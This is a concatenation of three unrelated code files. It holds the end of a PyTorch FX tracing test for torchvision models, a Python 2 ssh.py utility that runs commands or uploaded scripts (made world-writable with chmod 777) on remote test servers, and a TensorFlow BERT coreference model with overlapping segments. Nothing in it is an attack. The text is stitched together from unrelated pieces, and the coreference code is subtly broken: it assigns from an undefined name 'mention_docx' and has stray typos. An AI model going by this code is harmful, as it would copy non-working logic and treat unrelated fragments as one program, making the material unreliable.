self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
err, exc = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
err, exc = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(err, exc):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
ssh.py
|
#!/usr/bin/python
import getopt
import sys
from threading import Thread
from datetime import datetime
import uuid
sys.path = [".", "lib"] + sys.path
from platform_utils.remote.remote_util import \
RemoteMachineShellConnection
import TestInput
import logging.config
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
def usage(error=None):
print """\
Syntax: ssh.py [options] [command]
Options:
-p <key=val,...> Comma-separated key=value info.
-i <file> Path to .ini file containing cluster information.
Available keys:
script=<file> Local script to run
parallel=true Run the command in parallel on all machines
Examples:
ssh.py -i /tmp/ubuntu.ini -p script=/tmp/set_date.sh
ssh.py -i /tmp/ubuntu.ini -p parallel=false ls -l /tmp/core*
"""
sys.exit(error)
class CommandRunner(object):
def __init__(self, server, command):
self.server = server
self.command = command
def run(self):
remote_client = RemoteMachineShellConnection(self.server)
output, error = remote_client.execute_command(self.command)
print self.server.ip
print "\n".join(output)
print "\n".join(error)
class ScriptRunner(object):
def __init__(self, server, script):
self.server = server
with open(script) as f:
self.script_content = f.read()
self.script_name = "/tmp/" + str(uuid.uuid4())
def run(self):
remote_client = RemoteMachineShellConnection(self.server)
remote_client.create_file(self.script_name, self.script_content)
output, error = remote_client.execute_command(
"chmod 777 {0} ; {0} ; rm -f {0}".format(self.script_name))
print self.server.ip
print "\n".join(output)
print "\n".join(error)
class RemoteJob(object):
def sequential_remote(self, input):
remotes = []
params = input.test_params
for server in input.servers:
if "script" in params:
remotes.append(ScriptRunner(server, params["script"]))
if "command" in params:
remotes.append(CommandRunner(server, params["command"]))
for remote in remotes:
try:
remote.run()
except Exception as ex:
print "unable to complete the job: {0}".format(ex)
def parallel_remote(self, input):
remotes = []
params = input.test_params
for server in input.servers:
if "script" in params:
remotes.append(ScriptRunner(server, params["script"]))
if "command" in params:
remotes.append(CommandRunner(server, params["command"]))
remote_threads = []
for remote in remotes:
remote_threads.append(Thread(target=remote.run))
for remote_thread in remote_threads:
remote_thread.start()
for remote_thread in remote_threads:
remote_thread.join()
def main():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p:', [])
for o, a in opts:
if o == "-h":
usage()
input = TestInput.TestInputParser.get_test_input(sys.argv)
if not input.servers:
usage(
"ERROR: no servers specified. Please use the -i "
"parameter.")
except IndexError:
usage()
except getopt.GetoptError, error:
usage("ERROR: " + str(error))
command_offset = 3
if "-p" in sys.argv[:4]:
command_offset += 2
command = " ".join(sys.argv[command_offset:])
if command:
input.test_params["command"] = command
if input.param("parallel", True):
# workaround for a python2.6 bug of using strptime with threads
datetime.strptime("30 Nov 00", "%d %b %y")
RemoteJob().parallel_remote(input)
else:
RemoteJob().sequential_remote(input)
if __name__ == "__main__":
main()
def create_log_file(log_config_file_name, log_file_name, level):
tmpl_log_file = open("jython.logging.conf")
log_file = open(log_config_file_name, "w")
log_file.truncate()
for line in tmpl_log_file:
newline = line.replace("@@LEVEL@@", level)
newline = newline.replace("@@FILENAME@@",
log_file_name.replace('\\', '/'))
log_file.write(newline)
log_file.close()
tmpl_log_file.close()
|
overlap.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import util
import coref_ops
import conll
import metrics
import optimization
from bert import tokenization
from bert import modeling
from pytorch_to_tf import load_from_pytorch_checkpoint
class CorefModel(object):
def __init__(self, config):
self.config = config
self.subtoken_maps = {}
self.max_segment_len = config['max_segment_len']
self.max_span_width = config["max_span_width"]
self.mask_perc = config['mask_percentage'] #MODIFIED
self.n_placeholders = 1 #MODIFIED
self.genres = { g:i for i,g in enumerate(config["genres"]) }
self.eval_data = None # Load eval data lazily.
self.bert_config = modeling.BertConfig.from_json_file(config["bert_config_file"])
self.sep = 102
self.cls = 101
self.tokenizer = tokenization.FullTokenizer(
vocab_file=config['vocab_file'], do_lower_case=False)
input_props = []
input_props.append((tf.int32, [None, None])) # input_ids.
input_props.append((tf.int32, [None, None])) # input_mask
input_props.append((tf.int32, [None, None])) # input_ids.
input_props.append((tf.int32, [None, None])) # input_mask
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None, None])) # Speaker IDs.
input_props.append((tf.int32, [])) # Genre.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # Sentence Map
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
# bert stuff
tvars = tf.trainable_variables()
assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, config['tf_checkpoint'])
init_from_checkpoint = tf.train.init_from_checkpoint if config['init_checkpoint'].endswith('ckpt') else load_from_pytorch_checkpoint
init_from_checkpoint(config['init_checkpoint'], assignment_map)
print("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
# tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
# init_string)
print(" name = %s, shape = %s%s" % (var.name, var.shape, init_string))
num_train_steps = int(
self.config['num_docs'] * self.config['num_epochs'])
num_warmup_steps = int(num_train_steps * 0.1)
self.global_step = tf.train.get_or_create_global_step()
self.train_op = optimization.create_custom_optimizer(tvars,
self.loss, self.config['bert_learning_rate'], self.config['task_learning_rate'],
num_train_steps, num_warmup_steps, False, self.global_step, freeze=-1)
def start_enqueue_thread(self, session):
print('Loading data')
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
if self.config['single_example']:
for example in train_examples:
example = add_masks(example, mask_profile = 'percentage', all_profiles = False, n_masks_profile = 1, skip_first_mention = False,
perc_mask=self.mask_perc, n_placeholders = self.n_placeholders)
tensorized_example = self.tensorize_example(example[0], is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
else:
examples = []
for example in train_examples:
example = add_masks(example, mask_profile = 'percentage', all_profiles = False, n_masks_profile = 1, skip_first_mention = False,
perc_mask=self.mask_perc, n_placeholders = self.n_placeholders)
tensorized = self.tensorize_example(example[0], is_training=True)
if type(tensorized) is not list:
tensorized = [tensorized]
examples += tensorized
random.shuffle(examples)
print('num examples', len(examples))
for example in examples:
feed_dict = dict(zip(self.queue_input_tensors, example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() ]
saver = tf.train.Saver(vars_to_restore)
checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def get_speaker_dict(self, speakers):
speaker_dict = {'UNK': 0, '[SPL]': 1}
for s in speakers:
if s not in speaker_dict and len(speaker_dict) < self.config['max_num_speakers']:
speaker_dict[s] = len(speaker_dict)
return speaker_dict
def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
cluster_ids = np.zeros(len(gold_mentions))
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
sentences = example["sentences"]
#sentences = [sentence[1:-1] for sentence in sentences]
num_words = sum(len(s) for s in sentences)
speakers = example["speakers"]
# assert num_words == len(speakers), (num_words, len(speakers))
speaker_dict = self.get_speaker_dict(util.flatten(speakers))
sentence_map = example['sentence_map']
max_sentence_length = self.max_segment_len #270 #max(len(s) for s in sentences)
max_len = max(len(s) + 2 for s in sentences) # CHANGED; two symbols added later
if max_len > max_sentence_length:
max_sentence_length = max_len
text_len = np.array([len(s) for s in sentences])
input_ids, input_mask, speaker_ids, prev_overlap = [], [], [], []
overlap_ids, overlap_mask = [], []
half = self.max_segment_len // 2
prev_tokens_per_seg = []
for i, (sentence, speaker) in enumerate(zip(sentences, speakers)):
prev_tokens_per_seg += [len(prev_overlap)]
overlap_words = ['[CLS]'] + prev_overlap + sentence[:half] + ['[SEP]']
prev_overlap = sentence[half:]
sentence = ['[CLS]'] + sentence + ['[SEP]']
sent_input_ids = self.tokenizer.convert_tokens_to_ids(sentence)
sent_input_mask = [1] * len(sent_input_ids)
sent_speaker_ids = [speaker_dict.get(s, 0) for s in ['##'] + speaker + ['##']]
while len(sent_input_ids) < max_sentence_length:
sent_input_ids.append(0)
sent_input_mask.append(0)
sent_speaker_ids.append(0)
overlap_input_ids = self.tokenizer.convert_tokens_to_ids(overlap_words)
overlap_input_mask = [1] * len(overlap_input_ids)
while len(overlap_input_ids) < max_sentence_length:
overlap_input_ids.append(0)
overlap_input_mask.append(0)
input_ids.append(sent_input_ids)
speaker_ids.append(sent_speaker_ids)
input_mask.append(sent_input_mask)
overlap_ids.append(overlap_input_ids)
overlap_mask.append(overlap_input_mask)
overlap_words = ['[CLS]'] + prev_overlap + ['[SEP]']
overlap_input_ids = self.tokenizer.convert_tokens_to_ids(overlap_words)
overlap_input_mask = [1] * len(overlap_input_ids)
prev_tokens_per_seg += [len(prev_overlap)]
while len(overlap_input_ids) < max_sentence_length:
overlap_input_ids.append(0)
overlap_input_mask.append(0)
overlap_ids.append(overlap_input_ids)
overlap_mask.append(overlap_input_mask)
input_ids = np.array(input_ids)
input_mask = np.array(input_mask)
speaker_ids = np.array(speaker_ids)
overlap_ids = np.array(overlap_ids)
overlap_mask = np.array(overlap_mask)
assert num_words == (np.sum(input_mask) - 2*np.shape(input_mask)[0]), (num_words, np.sum(input_mask))
assert num_words == (np.sum(overlap_mask) - 2*np.shape(overlap_mask)[0]), (num_words, np.sum(overlap_mask), np.shape(overlap_mask))
doc_key = example["doc_key"]
self.subtoken_maps[doc_key] = example["subtoken_map"]
genre = self.genres[doc_key[:2]]
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
example_tensors = (input_ids, input_mask, overlap_ids, overlap_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map)
if is_training and len(sentences) > self.config["max_training_sentences"]:
return self.truncate_example(* (example_tensors + (prev_tokens_per_seg, )))
else:
return example_tensors
def truncate_example(self, input_ids, input_mask, overlap_ids, overlap_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map, prev_tokens_per_seg, sentence_offset=None):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = input_ids.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences) if sentence_offset is None else sentence_offset
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
input_ids = input_ids[sentence_offset:sentence_offset + max_training_sentences, :]
input_mask = input_mask[sentence_offset:sentence_offset + max_training_sentences, :]
overlap_ids = overlap_ids[sentence_offset:sentence_offset + max_training_sentences + 1, :]
overlap_mask = overlap_mask[sentence_offset:sentence_offset + max_training_sentences + 1, :]
overlap_ids[-1, 1 + prev_tokens_per_seg[sentence_offset + max_training_sentences]] = self.sep
overlap_ids[-1, 2 + prev_tokens_per_seg[sentence_offset + max_training_sentences]:] = 0
overlap_mask[-1, 2 + prev_tokens_per_seg[sentence_offset + max_training_sentences]:] = 0
overlap_mask[0, 1: 1 + prev_tokens_per_seg[sentence_offset ]] = 0
assert num_words == overlap_mask.sum() - 2 * np.shape(overlap_ids)[0], (num_words, overlap_mask.sum(), text_len)
speaker_ids = speaker_ids[sentence_offset:sentence_offset + max_training_sentences, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
sentence_map = sentence_map[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return input_ids, input_mask, overlap_ids, overlap_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
if self.config['use_prior']:
antecedent_distance_buckets = self.bucket_distance(antecedent_offsets) # [k, c]
distance_scores = util.projection(tf.nn.dropout(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), self.dropout), 1, initializer=tf.truncated_normal_initializer(stddev=0.02)) #[10, 1]
antecedent_distance_scores = tf.gather(tf.squeeze(distance_scores, 1), antecedent_distance_buckets) # [k, c]
fast_antecedent_scores += antecedent_distance_scores
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def combine_passes(self, original_doc, input_ids, input_mask, overlap_doc, overlap_ids, overlap_mask):
overlap_mask, input_mask = tf.equal(overlap_mask, 1), tf.equal(input_mask, 1)
org_content_mask = tf.logical_and(input_mask, tf.logical_and(tf.not_equal(input_ids, self.cls), tf.not_equal(input_ids, self.sep)))
overlap_content_mask = tf.logical_and(overlap_mask, tf.logical_and(tf.not_equal(overlap_ids, self.cls), tf.not_equal(overlap_ids, self.sep)))
flat_org_doc = self.flatten_emb_by_sentence(original_doc, org_content_mask)
flat_overlap_doc = self.flatten_emb_by_sentence(overlap_doc, overlap_content_mask)
with tf.variable_scope("combo"):
f = tf.sigmoid(util.projection(tf.concat([flat_org_doc, flat_overlap_doc], -1), util.shape(flat_org_doc, -1))) # [n, emb]
combo = f * flat_org_doc + (1 - f) * flat_overlap_doc
return combo, org_content_mask
def get_predictions_and_loss(self, input_ids, input_mask, overlap_ids, overlap_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map):
model = modeling.BertModel(
config=self.bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
use_one_hot_embeddings=False,
scope='bert')
original_doc = model.get_sequence_output()
model = modeling.BertModel(
config=self.bert_config,
is_training=is_training,
input_ids=overlap_ids,
input_mask=overlap_mask,
use_one_hot_embeddings=False,
scope='bert')
overlap_doc = model.get_sequence_output()
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
num_sentences = tf.shape(input_ids)[0]
max_sentence_length = tf.shape(input_mask)[1] - 2
mention_doc, org_content_mask = self.combine_passes(original_doc, input_ids, input_mask, overlap_doc, overlap_ids, overlap_mask)
num_words = util.shape(mention_doc, 0)
antecedent_doc = mention_docx
# mask out cross-sentence candidates
flattened_sentence_indices = sentence_map
candidate_starts = tf.tile(tf.expand_dims(tf.range(num_words), 1), [1, self.max_span_width]) # [num_words, max_span_width]
candidate_ends = candidate_starts + tf.expand_dims(tf.range(self.max_span_width), 0) # [num_words, max_span_width]
candidate_start_sentence_indices = tf.gather(flattened_sentence_indices, candidate_starts) # [num_words, max_span_width]
candidate_end_sentence_indices = tf.gather(flattened_sentence_indices, tf.minimum(candidate_ends, num_words - 1)) # [num_words, max_span_width]
candidate_mask = tf.logical_and(candidate_ends < num_words, tf.equal(candidate_start_sentence_indices, candidate_end_sentence_indices)) # [num_words, max_span_width]
flattened_candidate_mask = tf.reshape(candidate_mask, [-1]) # [num_words * max_span_width]
candidate_starts = tf.boolean_mask(tf.reshape(candidate_starts, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_ends = tf.boolean_mask(tf.reshape(candidate_ends, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_sentence_indices = tf.boolean_mask(tf.reshape(candidate_start_sentence_indices, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends, cluster_ids) # [num_candidates]
candidate_span_emb = self.get_span_emb(mention_doc, mention_doc, candidate_starts, candidate_ends) # [num_candidates, emb]
candidate_mention_scores = self.get_mention_scores(candidate_span_emb, candidate_starts, candidate_ends)
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
# beam size
k = tf.minimum(3900, tf.to_int32(tf.floor(tf.to_float(num_words) * self.config["top_span_ratio"])))
c = tf.minimum(self.config["max_top_antecedents"], k)
# pull from beam
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
num_words,
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
# don't need this
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]]), genre) # [emb]
if self.config['use_metadata']:
speaker_ids = self.flatten_emb_by_sentence(speaker_ids, org_content_mask)
top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]i
else:
top_span_speaker_ids = None
# antecedent scores -- change this
dummy_scores = tf.zeros([k, 1]) # [k, 1]
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(top_span_emb, top_span_mention_scores, c)
num_segs, seg_len = util.shape(org_content_mask, 0), util.shape(org_content_mask, 1)
word_segments = tf.reshape(tf.tile(tf.expand_dims(tf.range(0, num_segs), 1), [1, seg_len]), [-1])
flat_word_segments = tf.boolean_mask(word_segments, tf.reshape(org_content_mask, [-1]))
mention_segments = tf.expand_dims(tf.gather(flat_word_segments, top_span_starts), 1) # [k, 1]
antecedent_segments = tf.gather(flat_word_segments, tf.gather(top_span_starts, top_antecedents)) #[k, c]
segment_distance = tf.clip_by_value(mention_segments - antecedent_segments, 0, self.config['max_training_sentences'] - 1) if self.config['use_segment_distance'] else None #[k, c]
if self.config['fine_grained']:
for i in range(self.config["coref_depth"]):
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb, top_antecedents, top_antecedent_emb, top_antecedent_offsets, top_span_speaker_ids, genre_emb, segment_distance) # [k, c]
top_antecedent_weights = tf.nn.softmax(tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb], 1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb, 1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1), util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
else:
top_antecedent_scores = top_fast_antecedent_scores
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
loss = tf.reduce_sum(loss) # []
return [candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores], loss
def get_span_emb(self, head_emb, context_outputs, span_starts, span_ends):
span_emb_list = []
span_start_emb = tf.gather(context_outputs, span_starts) # [k, emb]
span_emb_list.append(span_start_emb)
span_end_emb = tf.gather(context_outputs, span_ends) # [k, emb]
span_emb_list.append(span_end_emb)
span_width = 1 + span_ends - span_starts # [k]
if self.config["use_features"]:
span_width_index = span_width - 1 # [k]
span_width_emb = tf.gather(tf.get_variable("span_width_embeddings", [self.config["max_span_width"], self.config["feature_size"]]), span_width_index) # [k, emb]
span_width_emb = tf.nn.dropout(span_width_emb, self.dropout)
span_emb_list.append(span_width_emb)
if self.config["model_heads"]:
mention_word_scores = self.get_masked_mention_word_scores(context_outputs, span_starts, span_ends)
head_attn_reps = tf.matmul(mention_word_scores, context_outputs) # [K, T]
span_emb_list.append(head_attn_reps)
span_emb = tf.concat(span_emb_list, 1) # [k, emb]
return span_emb # [k, emb]
def get_mention_scores(self, span_emb, span_starts, span_ends):
with tf.variable_scope("mention_scores"):
span_scores = util.ffnn(span_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [k, 1]
if self.config['use_prior']:
span_width_emb = tf.get_variable("span_width_prior_embeddings", [self.config["max_span_width"], self.config["feature_size"]]) # [W, emb]
span_width_index = span_ends - span_starts # [NC]
with tf.variable_scope("width_scores"):
width_scores = util.ffnn(span_width_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1, self.dropout) # [W, 1]
width_scores = tf.gather(width_scores, span_width_index)
span_scores += width_scores
return span_scores
def get_width_scores(self, doc, starts, ends):
distance = ends - starts
span_start_emb = tf.gather(doc, starts)
hidden = util.shape(doc, 1)
with tf.variable_scope('span_width'):
span_width_emb = tf.gather(tf.get_variable("start_width_embeddings", [self.config["max_span_width"], hidden], initializer=tf.truncated_normal_initializer(stddev=0.02)), distance) # [W, emb]
scores = tf.reduce_sum(span_start_emb * span_width_emb, axis=1)
return scores
def get_masked_mention_word_scores(self, encoded_doc, span_starts, span_ends):
num_words = util.shape(encoded_doc, 0) # T
num_c = util.shape(span_starts, 0) # NC
doc_range = tf.tile(tf.expand_dims(tf.range(0, num_words), 0), [num_c, 1]) # [K, T]
mention_mask = tf.logical_and(doc_range >= tf.expand_dims(span_starts, 1), doc_range <= tf.expand_dims(span_ends, 1)) #[K, T]
with tf.variable_scope("mention_word_attn"):
word_attn = tf.squeeze(util.projection(encoded_doc, 1, initializer=tf.truncated_normal_initializer(stddev=0.02)), 1)
mention_word_attn = tf.nn.softmax(tf.log(tf.to_float(mention_mask)) + tf.expand_dims(word_attn, 0))
return mention_word_attn
def softmax_loss(self, antecedent_scores, antecedent_labels):
gold_scores = antecedent_scores + tf.log(tf.to_float(antecedent_labels)) # [k, max_ant + 1]
marginalized_gold_scores = tf.reduce_logsumexp(gold_scores, [1]) # [k]
log_norm = tf.reduce_logsumexp(antecedent_scores, [1]) # [k]
return log_norm - marginalized_gold_scores # [k]
def bucket_distance(self, distances):
"""
Places the given values (designed for distances) into 10 semi-logscale buckets:
[0, 1, 2, 3, 4, 5-7, 8-15, 16-31, 32-63, 64+].
"""
logspace_idx = tf.to_int32(tf.floor(tf.log(tf.to_float(distances))/math.log(2))) + 3
use_identity = tf.to_int32(distances <= 4)
combined_idx = use_identity * distances + (1 - use_identity) * logspace_idx
return tf.clip_by_value(combined_idx, 0, 9)
